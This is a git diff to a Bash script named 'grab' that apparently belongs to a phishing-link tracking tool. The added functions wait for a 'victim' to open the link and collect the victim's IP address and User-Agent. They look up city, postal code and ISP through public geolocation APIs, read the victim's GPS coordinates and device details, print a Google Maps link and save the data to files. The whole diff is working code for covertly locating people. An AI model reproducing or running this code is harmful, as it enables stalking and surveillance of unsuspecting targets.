Update grab

diff --git a/grab b/grab
--- a/grab
+++ b/grab
@@ -187,8 +187,127 @@ glocfound
 
 }
 
+glocfound() {
+
+printf "\e[0m\n"
+printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Waiting for Victim ,\e[0m\e[1;96m Ctrl + C to exit.\e[0m\n"
+while [ true ]; do
 
 
+if [[ -e ".server/location/ip.txt" ]]; then
+printf "\e[0m\n"
+printf " \e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;92m Victim IP Found!\n"
+printf "\e[0m\n"
+gloc_catch_ip
+
+fi
+sleep 1
+done 
+
+}
+gloc_catch_ip() {
+
+touch location.txt
+glocip=$(grep -a 'IP:' .server/location/ip.txt | cut -d " " -f2 | tr -d '\r')
+IFS=$'\n'
+glocua=$(grep 'User-Agent:' .server/location/ip.txt | cut -d '"' -f2)
+printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Victim IP :\e[0m\e[1;96m %s\e[0m\n" $glocip
+printf "\e[0m\n"
+printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m User-Agent :\e[0m\e[1;96m %s\e[0m\n" $glocua
+printf "\e[0m\n"
+printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;96m Saved:\e[0m\e[1;93m victim_ip.txt\e[0m\n"
+cat .server/location/ip.txt >> victim_ip.txt
+
+ipaddripapico=$(curl -s "https://ipapi.co/$useripaddress/json" -L)
+ipaddripapicom=$(curl -s "http://ip-api.com/json/$useripaddress" -L)
+usercity=$(echo $ipaddripapico | grep -Po '(?<="city":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+useregion=$(echo $ipaddripapico | grep -Po '(?<="region":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+usercountry=$(echo $ipaddripapico | grep -Po '(?<="country_name":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+usertime=$(echo $ipaddripapicom | grep -Po '(?<="timezone":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+userpostal=$(echo $ipaddripapicom | grep -Po '(?<="zip":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+userisp=$(echo $ipaddripapico | grep -Po '(?<="org":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+userasn=$(echo $ipaddripapico | grep -Po '(?<="asn":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+usercountrycode=$(echo $ipaddripapico | grep -Po '(?<="country_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+usercalling=$(echo $ipaddripapico | grep -Po '(?<="country_calling_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
+
+printf "\e[0m\n"
+printf " \e[1;31m[\e[1;37m::\e[1;31m]\e[1;33m IP Credentials \e[1;31m[\e[1;37m::\e[1;31m]\e[0m\n"
+printf "\e[0m\n"
+printf "  \e[0m\e[1;93m  City          \e[0m\e[1;96m:\e[0m\e[1;92m   $usercity\e[0m\n"
+printf "  \e[0m\e[1;93m  Region        \e[0m\e[1;96m:\e[0m\e[1;92m   $useregion\e[0m\n"
+printf "  \e[0m\e[1;93m  Country       \e[0m\e[1;96m:\e[0m\e[1;92m   $usercountry\e[0m\n"
+printf "  \e[0m\e[1;93m  Time Zone     \e[0m\e[1;96m:\e[0m\e[1;92m    $usertime\e[0m\n"
+printf "  \e[0m\e[1;93m  Postal Code   \e[0m\e[1;96m:\e[0m\e[1;92m    $userpostal\e[0m\n"
+printf "  \e[0m\e[1;93m  Country Code  \e[0m\e[1;96m:\e[0m\e[1;92m   $usercountrycode\e[0m\n"
+printf "  \e[0m\e[1;93m  Calling Code  \e[0m\e[1;96m:\e[0m\e[1;92m   $usercalling\e[0m\n"
+printf "  \e[0m\e[1;93m  ISP           \e[0m\e[1;96m:\e[0m\e[1;92m   $userisp\e[0m\n"
+printf "  \e[0m\e[1;93m  ASN           \e[0m\e[1;96m:\e[0m\e[1;92m   $userasn\e[0m\n"
+printf "\e[0m\n"
+
+while [ true ]; do
+
+
+if [[ -e ".server/location/location.txt" ]]; then
+gloc_catch_cred
+
+fi
+sleep 0.5
+if [[ -e ".server/location/error.txt" ]]; then
+checkerror=$(grep -o 'Error:.*' server/error.txt | cut -d " " -f2 | tr -d ' ' )
+if [[ $checkerror == 1 ]]; then
+printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m User Denied Access !!\e[0m\n"
+rm -rf server/error.txt
+
+else
+printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m User Denied Access !!\e[0m\n"
+exit 1
+fi
+fi
+
+sleep 0.5
+
+done
+
+}
+
+gloc_catch_cred() {
+
+longitude=$(grep -o 'Longitude:.*' .server/location/location.txt | cut -d " " -f2 | tr -d ' ')
+IFS=$'\n'
+latitude=$(grep -o 'Latitude:.*' .server/location/location.txt | cut -d ":" -f2 | tr -d ' ')
+accuracy=$(grep -o 'Accuracy:.*' .server/location/location.txt | cut -d ":" -f2 | tr -d ' ')
+hardware=$(grep -o 'Cores:.*' .server/location/location.txt | cut -d ":" -f2 | tr -d ' ')
+platform=$(grep -o 'Platform:.*' .server/location/location.txt | cut -d ":" -f2 | tr -d ' ')
+memory=$(grep -o 'Memory:.*' .server/location/location.txt | cut -d ":" -f2 | tr -d ' ')
+height=$(grep -o 'Screen Height:.*' .server/location/location.txt | cut -d ":" -f2 | tr -d ' ')
+width=$(grep -o 'Screen Width:.*' .server/location/location.txt | cut -d ":" -f2 | tr -d ' ')
+printf "\n"
+printf " \e[1;31m[\e[1;37m::\e[1;31m]\e[1;33m Geolocation \e[1;31m[\e[1;37m::\e[1;31m]\e[0m\n"
+printf "\n"
+printf "  \e[0m\e[1;93m  Latitude          \e[0m\e[1;96m:\e[0m\e[1;92m   $latitude\e[0m\n"
+printf "  \e[0m\e[1;93m  Longitude         \e[0m\e[1;96m:\e[0m\e[1;92m   $longitude\e[0m\n"
+printf "  \e[0m\e[1;93m  Accuracy          \e[0m\e[1;96m:\e[0m\e[1;92m   $accuracy\e[0m\n"
+printf "\e[0m\n"
+printf "  \e[0m\e[1;93m  GOOGLE Maps   \e[0m\e[1;96m:\e[0m\e[1;94m  https://maps.google.com/?q=$latitude,$longitude\e[0m\n"
+printf "\e[0m\n"
+printf " \e[1;31m[\e[1;37m::\e[1;31m]\e[1;33m Device Info \e[1;31m[\e[1;37m::\e[1;31m]\e[0m\n"
+printf "\e[0m\n"
+printf "  \e[0m\e[1;93m  Platform          \e[0m\e[1;96m:\e[0m\e[1;92m   $platform\e[0m\n"
+printf "  \e[0m\e[1;93m  Cores             \e[0m\e[1;96m:\e[0m\e[1;92m   $hardware\e[0m\n"
+printf "  \e[0m\e[1;93m  Memory            \e[0m\e[1;96m:\e[0m\e[1;92m   $memory\e[0m\n"
+printf "  \e[0m\e[1;93m  Resolution        \e[0m\e[1;96m:\e[0m\e[1;92m   %sx%s\n\e[0m" $height $width
+cat .server/location/location.txt >> location.txt
+printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;96m Saved:\e[0m\e[1;93m location.txt\e[0m\n"
+
+killall -2 php > /dev/null 2>&1
+killall -2 ngrok > /dev/null 2>&1
+killall ssh > /dev/null 2>&1
+if [[ -e .grablink ]]; then
+rm -rf .grablink
+fi
+exit 1
+
+}
 
 
 
